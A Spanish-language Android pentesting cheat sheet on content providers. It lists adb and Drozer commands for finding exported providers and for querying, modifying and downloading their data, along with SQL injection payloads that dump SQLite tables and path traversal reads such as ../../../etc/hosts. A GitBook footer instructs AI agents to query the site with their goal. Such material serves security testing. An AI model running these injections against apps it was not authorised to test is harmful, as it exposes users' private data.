> For the complete documentation index, see [llms.txt](https://mobile.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mobile.mrw0l05zyn.cl/android/analisis-dinamico/content-providers.md).

# Content providers

## Búsqueda de content providers con exportación habilitada

```sh
# AndroidManifest.xml
## explícitamente
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implícitamente
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported=\"true\""

# Drozer
run app.provider.info -a <app-package-name>
```

## Obtener URIs de content providers

```sh
# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>
```

## Interacción general con content providers

### Android Debug Bridge (adb) <a href="#interaccion-general-con-content-providers-adb" id="interaccion-general-con-content-providers-adb"></a>

```sh
# General
adb shell content <command> --uri <uri> <parameters>

# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"

# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>

# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>

# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>

# Lectura de archivo
adb shell content read --uri <uri>/<file>

# Descarga de archivo 
adb shell content read --uri <uri>/<file> > <file>
```

### Drozer <a href="#interaccion-general-con-content-providers-drozer" id="interaccion-general-con-content-providers-drozer"></a>

```sh
# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'

# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>

# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'

# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>

# Lectura de archivo
run app.provider.read <uri>/<file>

# Descarga de archivo
run app.provider.download <uri>/<file> .
```

## SQL injection (SQLi)

Identificación de SQLi.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"

# Drozer 
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"
```

Enumeración de tablas.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"

# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"
```

Obtención de datos de una tabla.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"

# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"
```

## Path traversal

Identificación de path traversal.

```sh
# Drozer
run scanner.provider.traversal -a <app-package-name>
```

Lectura de archivo.

```sh
# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts

# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hosts
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://mobile.mrw0l05zyn.cl/android/analisis-dinamico/content-providers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.